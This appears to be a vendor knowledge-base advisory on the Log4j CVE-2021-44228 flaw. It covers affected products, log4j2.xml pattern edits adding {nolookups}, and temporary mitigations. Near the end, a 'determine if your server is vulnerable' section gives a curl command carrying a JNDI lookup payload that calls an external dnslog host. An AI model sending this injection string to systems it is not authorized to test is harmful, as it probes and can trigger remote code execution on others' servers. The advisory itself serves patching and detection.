Follow

Log4j CVE-2021-44228 Zero-Day Vulnerability notice

Applies to:

No primary Venafi products are affected.

The UniCERT CA service that is shipped with Trust Protection Platform however, does make use of Log4J 2.14.0 and is vulnerable, though very difficult to be exploited. If you make use of that additional Certificate Authority Service, resolution steps follow in the Resolution section. If you do not use the UniCERT CA service, no additional remediation is necessary.

Resolution:

VaaS was impacted at time of disclosure, but has since been patched. No action is needed on the part of customers to patch VaaS. The version of Log4j used by VaaS has been updated to 2.16, and other mitigations have also been put in place.

If you are not sure whether you are making use of the UniCERT CA Service, look for an installed program called "Venafi UniCERT 5.3 Service" in your Add/Remove Programs list. If you do not have this Service installed, then you need not go any further: your installation is not impacted.Ah

In order to mitigate the Log4j vulnerability in the UniCERT CA service, update the log4j2.xml file located in \Venafi\Utilities\UpiProxy\log4j2.xml, replacing:

<pattern>[%-5level] %d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %c{1} - %msg%n</pattern>

with:

<pattern>[%-5level] %d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %c{1} - %msg{nolookups}%n</pattern>

And also:

<PatternLayout pattern="[%-5level] %d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %c{1} - %msg%n" />

with:

<PatternLayout pattern="[%-5level] %d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %c{1} - %msg{nolookups}%n" />

Again, if you do not make use of the UniCERT CA service, which has a separate .msi installer, these steps are not necessary.

Summary:

On December 10th 2021, a zero-day vulnerability in the Apache Log4j tool was revealed to the public at large. This vulnerability has been published as CVE-2021-44228.

Just as any company making use of Apache was likely to be vulnerable, Venafi's Venafi As A Service (VaaS) cloud product was vulnerable at time of disclosure, and remediation began immediately. On the same day, remediation was concluded and VaaS is no longer vulnerable to this CVE.

The optional CA service for UniCERT that can be optionally installed with TPP also makes use of the vulnerable Log4j version. This vulnerability can be mitigated yourself by following the instructions above, and a patch for the UniCERT msi is forthcoming. The vast majority of Venafi customers do not make use of this optional add-on, but if you are uncertain, instructions on how to find out if this optional service is installed are above. The UniCERT CA service cannot be installed as part of a normal TPP installation procedure; it is a separate installation that needs to be invoked on its own.

More Info:

If you are interested in how to detect whether an application is vulnerable to this vulnerability in general, see the following information.

Affected Version:

2.0 <= Apache log4j <= 2.14.1

Determine if your server is vulnerable sample:

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://xxx.dnslog.cn/a}'

Refreshing the page will show DNS queries which identify hosts who have triggered the vulnerability.

Temp remediation:

  • Modify every logging pattern layout to say %m{nolookups} instead of %m in your logging config files, see details at https://issues.apache.org/jira/browse/LOG4J2-2109 or,

  • Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, so that your classloader uses your replacement instead of the vulnerable version of the class.

Was this article helpful?
6 out of 6 found this helpful

Comments